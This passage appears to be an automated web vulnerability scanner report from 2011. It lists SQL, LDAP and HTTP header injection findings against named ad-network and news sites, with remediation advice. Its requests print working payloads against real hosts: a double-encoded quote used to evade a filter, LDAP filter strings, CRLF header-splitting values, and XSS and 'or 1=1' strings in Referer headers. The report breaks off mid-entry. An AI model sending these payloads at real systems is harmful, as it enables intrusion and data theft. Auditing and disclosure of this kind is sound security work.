window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...
<img width='239' height='45' name='opt_1' src='http://optout.imiclk.com/cgi/nai_status.cgi?nocache=0.7764398'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=1></td></tr><tr><td valign=top><b>AdBrite</b><br><a href=# onClick="window.open('2.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_2' src='http://www.adbrite.com/mb/nai_optout_check.php?nocache=0.6935803'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=2></td></tr><tr><td valign=top><b>AdChemy</b><br><a href=# onClick="window.open('3.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_3' src='http://events.adchemy.com/visitor/auuid/nai-status?nocache=0.4733174'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=3></td></tr><tr><td valign=top><b>Adconion</b><br><a href=# onClick="window.open('4.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_4' src='http://ads.amgdgt.com/ads/opt-out?op=check&src=NAI&j=&nocache=0.8685267'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=4></td></tr><tr><td valign=top><b>Adara Media</b><br><a href=# onClick="window.open('5.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_5' src='http://optout.yieldoptimizer.com/optout/ns?nocache=0.6828989'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=5></td></tr><tr><td valign=top><b>Adify Media</b><br><a href=# onClick="window.op
...[SNIP]...
1.40. http://y.timesunion.com/b/ss/hearstalbanytu/1/H.21/s97295546184759 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://y.timesunion.com
Path:   /b/ss/hearstalbanytu/1/H.21/s97295546184759

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/hearstalbanytu/1/H.21/s97295546184759?AQB=1&ndh=1&t=17/8/2011%2016%3A24%3A32%206%20300&vmt=4C9145CE&vmf=hearst.112.2o7.net&ns=hearst&pageName=HomePage&g=http%3A//www.timesunion.com/&r=http%3A//hearst.com/newspapers/albany-times-union.php&cc=USD&ch=home&server=timesunion.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A00PM&v17=5%3A00PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c22=Home&v22=Home&c23=4654&v23=4654&c24=home%20page&v24=home%20page&c28=http%3A//www.timesunion.com/&v29=http%3A//www.timesunion.com/&c42=http%3A//www.timesunion.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: y.timesunion.com
Proxy-Connection: keep-alive
Referer: http://www.timesunion.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1316294672447-New%7C1318886672447%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:36:58 GMT
Server: Omniture DC/2.0.0
Content-Length: 439
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/hearstalbanytu/1/H.21/s97295546184759 was no
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/hearstalbanytu/1/H.21/s97295546184759?AQB=1&ndh=1&t=17/8/2011%2016%3A24%3A32%206%20300&vmt=4C9145CE&vmf=hearst.112.2o7.net&ns=hearst&pageName=HomePage&g=http%3A//www.timesunion.com/&r=http%3A//hearst.com/newspapers/albany-times-union.php&cc=USD&ch=home&server=timesunion.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A00PM&v17=5%3A00PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c22=Home&v22=Home&c23=4654&v23=4654&c24=home%20page&v24=home%20page&c28=http%3A//www.timesunion.com/&v29=http%3A//www.timesunion.com/&c42=http%3A//www.timesunion.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: y.timesunion.com
Proxy-Connection: keep-alive
Referer: http://www.timesunion.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1316294672447-New%7C1318886672447%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:36:58 GMT
Server: Omniture DC/2.0.0
xserver: www498
Content-Length: 0
Content-Type: text/html

2. LDAP injection  previous  next
There are 3 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

2.1. http://ce.lijit.com/merge [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ce.lijit.com
Path:   /merge

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*?pid=2&3pid=439524AE9E11374EB2C0C71740C604 HTTP/1.1
Host: ce.lijit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: ljtrtb=eJyrVjJUslKyNDA2NjExMjYysDQ0M7AwNzM2UaoFAE9xBcY%3D; ljt_reader=1860442d61f8e1f2d8924f58549ca25b; _OACAP[4578]=1; _OABLOCK[4578]=1314593701; _OACCAP[593]=1; _OACBLOCK[593]=1314593701

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:09:13 GMT
Server: PWS/1.7.3.3
X-Px: ms h0-s1023.p10-sjc ( h0-s1004.p10-sjc), ms h0-s1004.p10-sjc ( origin>CONN)
Cache-Control: max-age=30
Expires: Sat, 17 Sep 2011 17:09:43 GMT
Age: 0
Content-Length: 284
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /*)(sn=* was not found on this server.</p>
<hr>
<address>Apache/2.2.14 (Ubuntu) Server at vap.lijit.com Port 80</address>
</body></html>

Request 2

GET /*)!(sn=*?pid=2&3pid=439524AE9E11374EB2C0C71740C604 HTTP/1.1
Host: ce.lijit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: ljtrtb=eJyrVjJUslKyNDA2NjExMjYysDQ0M7AwNzM2UaoFAE9xBcY%3D; ljt_reader=1860442d61f8e1f2d8924f58549ca25b; _OACAP[4578]=1; _OABLOCK[4578]=1314593701; _OACCAP[593]=1; _OACBLOCK[593]=1314593701

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:09:14 GMT
Server: PWS/1.7.3.3
X-Px: ms h0-s1023.p10-sjc ( h0-s1009.p10-sjc), ms h0-s1009.p10-sjc ( origin>CONN)
Cache-Control: max-age=30
Expires: Sat, 17 Sep 2011 17:09:44 GMT
Age: 0
Content-Length: 206
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /*)!(sn=* was not found on this server.</p>
</body></html>
2.2. http://pixel.quantserve.com/optout_set [nocache parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://pixel.quantserve.com
Path:   /optout_set

Issue detail

The nocache parameter appears to be vulnerable to LDAP injection attacks.

The payloads c399e1dd97544dad)(sn=* and c399e1dd97544dad)!(sn=* were each submitted in the nocache parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /optout_set?s=nai&nocache=c399e1dd97544dad)(sn=* HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EKUBIQHdB4HyBprRW9iB4QochAEA

Response 1

HTTP/1.1 302 Found
Connection: close
Set-Cookie: qoo=OPT_OUT; expires=Tue, 14-Sep-2021 17:19:38 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Location: /optout_verify?s=nai&nocache=c399e1dd97544dad)(sn=
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 17 Sep 2011 17:19:38 GMT
Server: QS

Request 2

GET /optout_set?s=nai&nocache=c399e1dd97544dad)!(sn=* HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EKUBIQHdB4HyBprRW9iB4QochAEA

Response 2

HTTP/1.1 302 Found
Connection: close
Set-Cookie: qoo=OPT_OUT; expires=Tue, 14-Sep-2021 17:19:38 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Location: /optout_verify?s=nai&nocache=c399e1dd97544dad)!(sn=
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 17 Sep 2011 17:19:38 GMT
Server: QS

2.3. http://www.networkadvertising.org/managing/optout_results.asp [optThis parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.networkadvertising.org
Path:   /managing/optout_results.asp

Issue detail

The optThis parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the optThis parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060%27%20or%201%3d1--%20=1
Cookie: __utma=1.519244467.1316296143.1316296143.1316296143.1; __utmb=1; __utmc=1; __utmz=1.1316296143.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral
Content-Type: application/x-www-form-urlencoded
Content-Length: 873

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=*)(sn=*&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&optThis=20&optThis=21&optThis=22&optThis=23&optThis=24&optThis=25&optThis=26&optThis=27&o
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 17:18:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 17:18:56 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://ww
...[SNIP]...
<img src=http://optout.imiclk.com/cgi/optout.cgi?nai=1&nocache=0.8184626 width=15 height=15></td> <td valign=top> <font face='verdana'><b>aCerno</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://www.adbrite.com/mb/nai_optout.php?nocache=0.735603 width=15 height=15></td> <td valign=top> <font face='verdana'><b>AdBrite</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://events.adchemy.com/visitor/auuid/nai-opt-out?nocache=0.5153401 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adchemy</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://ads.amgdgt.com/ads/opt-out?op=set&src=NAI&j=&nocache=0.9105494 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adconion</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://optout.yieldoptimizer.com/optout/nopt?nocache=0.7249216 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adara Media</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a
...[SNIP]...

Request 2

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060%27%20or%201%3d1--%20=1
Cookie: __utma=1.519244467.1316296143.1316296143.1316296143.1; __utmb=1; __utmc=1; __utmz=1.1316296143.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral
Content-Type: application/x-www-form-urlencoded
Content-Length: 873

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=*)!(sn=*&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&optThis=20&optThis=21&optThis=22&optThis=23&optThis=24&optThis=25&optThis=26&optThis=27&o
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 17:18:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 17:18:56 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://ww
...[SNIP]...
<img src=http://optout.imiclk.com/cgi/optout.cgi?nai=1&nocache=0.6879694 width=15 height=15></td> <td valign=top> <font face='verdana'><b>aCerno</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://www.adbrite.com/mb/nai_optout.php?nocache=0.6051098 width=15 height=15></td> <td valign=top> <font face='verdana'><b>AdBrite</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://events.adchemy.com/visitor/auuid/nai-opt-out?nocache=0.384847 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adchemy</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://ads.amgdgt.com/ads/opt-out?op=set&src=NAI&j=&nocache=0.7800562 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adconion</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://optout.yieldoptimizer.com/optout/nopt?nocache=0.5944285 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adara Media</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a
...[SNIP]...
3. HTTP header injection  previous  next
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

3.1. http://amch.questionmarket.com/adsc/d927907/35/43624044/decide.php [ES cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d927907/35/43624044/decide.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 9b8a5%0d%0a91d788bd1b was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d927907/35/43624044/decide.php?ord=1316296366 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=homepage&tile=1
Cookie: ES=9b8a5%0d%0a91d788bd1b; LP=1316270408; ST=913131_; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1_43407799-6-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:30:03 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a229.dl
Set-Cookie: CS1=deleted; expires=Fri, 17-Sep-2010 17:30:02 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1_43407799-6-1ce587bf7f31d0813bf9c7fac_43624044-35-42_927907-1-1; expires=Wed, 07-Nov-2012 09:30:03 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=9b8a5
91d788bd1b_927907-9E[|M-0; expires=Wed, 07-Nov-2012 09:30:03 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;
3.2. http://login.dotomi.com/ucm/UCMController [redir_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The value of the redir_url request parameter is copied into the Location response header. The payload 2eb83%0d%0aabef94bf3d9 was submitted in the redir_url parameter. This caused a response containing an injected HTTP header.

Request

GET /ucm/UCMController?dtm_com=31&dtm_cid=2000&dtm_cmagic=7d619c&dtm_format=7&redir_url=2eb83%0d%0aabef94bf3d9 HTTP/1.1
Host: login.dotomi.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: DotomiUser=230600846273249123$0$2065492370; DotomiNet=2$DjQqblZ1R3FBBWdeBwJ9XghHIzxZewFTXBUgOFBKYHtrfgoKBQpCXAECVkBLQlUCJjFWfmp3CzQBfEMHZV4LB3JVCVV7cgViUgRNUGBDBwEgEGR8AAEICEBeBAJWR0hCQ1psa08oOycGGRA5AmtmXgQAdl0%3D

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:24:55 GMT
X-Name: dmc-s02
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Thu, 15-Sep-2016 17:24:55 GMT; Path=/
Location: http://login.dotomi.com/ucm/2eb83
abef94bf3d9

Content-Type: text/html
Content-Length: 0

3.3. http://optout.crwdcntrl.net/optout [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The value of the ct request parameter is copied into the Location response header. The payload 8d123%0d%0ac8452c8724b was submitted in the ct parameter. This caused a response containing an injected HTTP header.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=8d123%0d%0ac8452c8724b HTTP/1.1
Host: optout.crwdcntrl.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: cc=optout

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:19:45 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 05-Oct-2079 20:33:52 GMT
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=8d123
c8452c8724b&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

3.4. http://optout.crwdcntrl.net/optout [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The value of the d request parameter is copied into the Location response header. The payload 71d66%0d%0a93e8c521907 was submitted in the d parameter. This caused a response containing an injected HTTP header.

Request

